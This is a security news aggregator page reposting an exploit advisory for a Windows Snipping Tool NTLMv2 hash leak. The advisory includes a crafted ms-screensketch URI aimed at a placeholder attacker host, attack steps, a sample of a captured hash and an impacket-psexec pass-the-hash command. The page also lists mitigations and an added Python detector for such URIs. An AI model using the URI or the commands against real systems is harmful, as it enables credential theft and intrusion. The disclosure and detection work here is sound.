Security News

Cybersecurity news aggregator

MEDIUM Vulnerabilities Exploit-DB

[local] Windows Snipping Tool - NTLMv2 Hash Hijack

  • What: Vulnerability in Windows Snipping Tool allows NTLMv2 hash hijack
  • Impact: Local attackers could exploit this to steal credentials

Windows Snipping Tool - NTLMv2 Hash Hijack

EDB-ID: 52567
CVE: 2026-33829
Author: NU11SECUR1TY
Type: LOCAL
Platform: WINDOWS
Date: 2026-05-15

# Exploit Title: Windows Snipping Tool - NTLMv2 Hash Hijack
# Date: 2026-04-22
# Exploit Author: nu11secur1ty
# Video Demo: https://www.patreon.com/posts/cve-2026-33829-156243398
# Vendor Homepage: https://www.microsoft.com
# Software Link: Built-in Windows Snipping Tool
# Version: Windows 10, Windows 11, Windows Server 2012-2025 (pre-April 2026 patch)
# Tested on: Windows 11 Pro (Build 22621) / Kali Linux 2026.1
# CVE: CVE-2026-33829
# Attack Type: Remote / Network-based
# Impact: Credential Theft (NTLMv2 Hash) / Pass-the-Hash
# CVSS Score: 4.3 (Medium) but HIGH impact in practice

## Vulnerable Systems
- Windows 10 (all versions before April 14, 2026 patch)
- Windows 11 (all versions before April 14, 2026 patch)
- Windows Server 2012, 2016, 2019, 2022, 2025 (before April 14, 2026 patch)

## Description
A vulnerability in Windows Snipping Tool (CVE-2026-33829) allows attackers to force NTLMv2 authentication to a remote SMB server via a crafted ms-screensketch:edit URI. When a victim clicks a malicious link and approves the "Open Snipping Tool" prompt, Windows automatically sends the user's NTLMv2 hash to the attacker-controlled server.

This exploit extends beyond the original PoC by also harvesting HTTP NTLM hashes (via WPAD), LLMNR, and MDNS poisoning - capturing MULTIPLE valid hashes from a SINGLE click. Captured hashes can be used for Pass-the-Hash attacks or cracked with Hashcat.

## Exploit Features (nu11secur1ty edition)
- ✅ Snipping Tool NTLM hash capture (original vector)
- ✅ Automatic HTTP NTLM authentication capture (additional vector)
- ✅ WPAD poisoning (automatic proxy config)
- ✅ LLMNR/MDNS poisoning (fallback vectors)
- ✅ Multi-harvest - captures multiple hashes from one click
- ✅ One-command execution (sudo python3 exploit.py)
- ✅ Auto-detects terminal and opens Responder in new window
- ✅ Built-in HTTP server for HTML delivery

## Proof of Concept
**Video Demonstration (Patreon Exclusive):**
https://www.patreon.com/posts/cve-2026-33829-156243398

1. Run exploit on attacker machine (Kali Linux):
   sudo python3 CVE-2026-33829-NTLMv2-Hash-Hijack.py
2. Victim (Windows 11) opens the malicious URL:
   http://<ATTACKER_IP>/exploit.html
3. Victim clicks the button and approves "Open Snipping Tool"
4. Attacker captures NTLMv2 hash(es):
   [HTTP] NTLMv2 Username : \Hacked
   [HTTP] NTLMv2 Hash : Hacked:::157e1f851f7c17e7:16D87BC0AD284FB6...
5. Attacker performs Pass-the-Hash to gain access:
   impacket-psexec -hashes :<HASH> Hacked@<VICTIM_IP>

## Attack Vector
ms-screensketch:edit?filePath=\\<ATTACKER_IP>\test\evil.png

## Requirements
Attacker: Kali Linux (or any Linux with Python3, impacket, responder)
Victim: Windows 10/11 with Snipping Tool (unpatched)

## Mitigations
- Apply Microsoft patch from April 14, 2026
- Block outbound SMB traffic (port 445)
- Disable NTLMv1 and restrict NTLMv2 via GPO
- Educate users not to click "Open Snipping Tool" prompts from untrusted sources

## References
- https://cybersecuritynews.com/windows-snipping-tool-vulnerability/
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33829
- https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2026-33829

## Exploit Code (NFO)
The exploit will not be published for security reasons!
For more information, please get in touch with me!

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
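
A defender-side check for the attack vector described above, as an added example that is not part of the original advisory or the author's code: it scans text such as mail bodies, HTML or proxy logs for ms-screensketch URIs whose filePath resolves to a remote host rather than a local file. The function names, the sample lines, and the decision to also flag percent-encoded, file:// and WebDAV-style (@port) path forms are assumptions made for illustration.

```python
import html
import re
from urllib.parse import unquote

# Matches the URI handler named in the advisory inside HTML, mail or proxy logs.
URI_RE = re.compile(r"ms-screensketch:[^\s\"'<>]+", re.IGNORECASE)
UNC_RE = re.compile(r"^\\\\([^\\]+)")  # \\host at the start of a path

def fully_unquote(value, rounds=3):
    """Percent-decode several times so double-encoded backslashes are normalised."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def remote_host(path):
    """Return the host a filePath value points at, or None for a local path."""
    p = fully_unquote(path).strip().replace("/", "\\")
    p = p[5:] if p.lower().startswith("file:") else p   # file://host/share form
    if p.upper().startswith("\\\\?\\UNC\\"):            # \\?\UNC\host\share form
        p = "\\\\" + p[8:]
    m = UNC_RE.match(p)
    if not m or m.group(1) in ("?", "."):               # \\?\C:\ and \\.\ are local
        return None
    return m.group(1).split("@")[0].lower()             # drop WebDAV @port suffix

def find_remote_snips(text):
    """Return (uri, host) for each ms-screensketch URI with a remote filePath."""
    hits = []
    for raw in URI_RE.findall(text):
        uri = html.unescape(raw)
        query = uri.partition("?")[2].split("#")[0]
        for pair in query.split("&"):
            key, _, value = pair.partition("=")
            if key.lower() == "filepath" and remote_host(value):
                hits.append((uri, remote_host(value)))
    return hits

# Constructed sample input (documentation address ranges, not real indicators).
SAMPLE = "\n".join([
    r'<a href="ms-screensketch:edit?filePath=\\192.0.2.10\test\evil.png">x</a>',
    r'ms-screensketch:edit?filePath=C:\Users\alice\Pictures\shot.png',
    r'MS-ScreenSketch:edit?filepath=%5C%5Cfiles.example.net%40443%5Cs%5Ca.png',
    r'ms-screensketch:edit?filePath=%255C%255C198.51.100.7%255Cx%255Cy.png',
    r'ms-screensketch:edit?filePath=file://203.0.113.9/s/p.png',
])

if __name__ == "__main__":
    for uri, host in find_remote_snips(SAMPLE):
        print(f"remote filePath -> {host}: {uri}")
```

A hit only says the link would make the client reach out to that host; pair it with the outbound SMB block and patch status from the mitigations list when triaging.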
